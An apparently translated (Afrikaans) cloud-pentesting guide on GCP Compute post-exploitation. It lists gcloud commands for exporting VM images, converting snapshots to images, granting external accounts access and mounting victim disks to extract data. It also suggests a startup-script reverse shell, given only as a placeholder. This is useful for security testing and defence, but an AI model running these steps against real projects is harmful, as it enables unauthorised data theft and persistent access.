GCP - Compute Post Exploitation

Compute

Vir meer inligting oor Compute en VPC (Netwerk) kyk:

Eksporteer & Inspekteer Beelde plaaslik

Dit sou 'n aanvaller in staat stel om toegang te verkry tot die data wat in reeds bestaande beelde bevat is of nuwe beelde van lopende VM's te skep en toegang tot hul data te verkry sonder om toegang tot die lopende VM te hê.

Dit is moontlik om 'n VM-beeld na 'n emmer te eksporteer en dit dan af te laai en plaaslik te monteer met die opdrag:

gcloud compute images export --destination-uri gs://<bucket-name>/image.vmdk --image imagetest --export-format vmdk
# The download the export from the bucket and mount it locally

Voordat hierdie aksie uitgevoer kan word, mag die aanvaller moontlik bevoegdhede oor die stoor-bucket benodig en beslis bevoegdhede oor cloudbuild aangesien dit die diens is wat gevra gaan word om die uitvoer uit te voer. Boonop, om dit te laat werk, benodig die codebuild SA en die compute SA bevoorregte toestemmings. Die cloudbuild SA <project-id>@cloudbuild.gserviceaccount.com benodig:

• roles/iam.serviceAccountTokenCreator

• roles/compute.admin

• roles/iam.serviceAccountUser

En die SA <project-id>-compute@developer.gserviceaccount.com benodig:

• roles/compute.storageAdmin

• roles/storage.objectAdmin

Eksporteer & Ondersoek Snapshots & Skyfies plaaslik

Dit is nie moontlik om snapshots en skyfies direk te eksporteer nie, maar dit is moontlik om 'n snapshot in 'n skyf, 'n skyf in 'n beeld te transformeer en volgens die vorige afdeling, daardie beeld te eksporteer om dit plaaslik te ondersoek.

# Create a Disk from a snapshot
gcloud compute disks create [NEW_DISK_NAME] --source-snapshot=[SNAPSHOT_NAME] --zone=[ZONE]

# Create an image from a disk
gcloud compute images create [IMAGE_NAME] --source-disk=[NEW_DISK_NAME] --source-disk-zone=[ZONE]

Ondersoek 'n Beeld wat 'n VM skep

Met die doel om toegang te verkry tot die data wat in 'n beeld gestoor is of binne 'n lopende VM van waar 'n aanvaller 'n beeld geskep het, is dit moontlik om 'n eksterne rekening toegang tot die beeld te gee:

gcloud projects add-iam-policy-binding [SOURCE_PROJECT_ID] \
--member='serviceAccount:[TARGET_PROJECT_SERVICE_ACCOUNT]' \
--role='roles/compute.imageUser'

en dan 'n nuwe VM daaruit skep:

gcloud compute instances create [INSTANCE_NAME] \
--project=[TARGET_PROJECT_ID] \
--zone=[ZONE] \
--image=projects/[SOURCE_PROJECT_ID]/global/images/[IMAGE_NAME]

As jy nie jou eksterne rekening toegang oor die beeld kon gee nie, kan jy 'n VM met daardie beeld in die slagoffer se projek begin en die metadata laat uitvoer 'n omgekeerde dop om toegang tot die beeld te verkry deur die param toe te voeg:

--metadata startup-script='#! /bin/bash
echo "hello"; <reverse shell>'

Inspect a Snapshot/Disk attaching it to a VM

Met die doel om toegang te verkry tot die data wat in 'n skyf of 'n snapshot gestoor is, kan jy die snapshot in 'n skyf omskep, 'n skyf in 'n beeld en die vorige stappe volg.

Of jy kan 'n eksterne rekening toegang verleen oor die skyf (as die beginpunt 'n snapshot is, gee toegang oor die snapshot of skep 'n skyf daarvan):

gcloud projects add-iam-policy-binding [PROJECT_ID] \
--member='user:[USER_EMAIL]' \
--role='roles/compute.storageAdmin'

Koppel die skyf aan 'n instansie:

gcloud compute instances attach-disk [INSTANCE_NAME] \
--disk [DISK_NAME] \
--zone [ZONE]

Mount die skyf binne die VM:

1. SSH in die VM:

gcloud compute ssh [INSTANCE_NAME] --zone [ZONE]

1. Identifiseer die Skyf: Sodra jy binne die VM is, identifiseer die nuwe skyf deur die skyf toestelle te lys. Gewoonlik kan jy dit vind as /dev/sdb, /dev/sdc, ens.

2. Formateer en Mount die Skyf (as dit 'n nuwe of rou skyf is):

• Skep 'n mount punt:

sudo mkdir -p /mnt/disks/[MOUNT_DIR]

• Mount die skyf:

sudo mount -o discard,defaults /dev/[DISK_DEVICE] /mnt/disks/[MOUNT_DIR]

As jy nie toegang tot 'n eksterne projek vir die snapshot of skyf kan gee nie, moet jy dalk hierdie aksies binne 'n instansie in dieselfde projek as die snapshot/skyf uitvoer.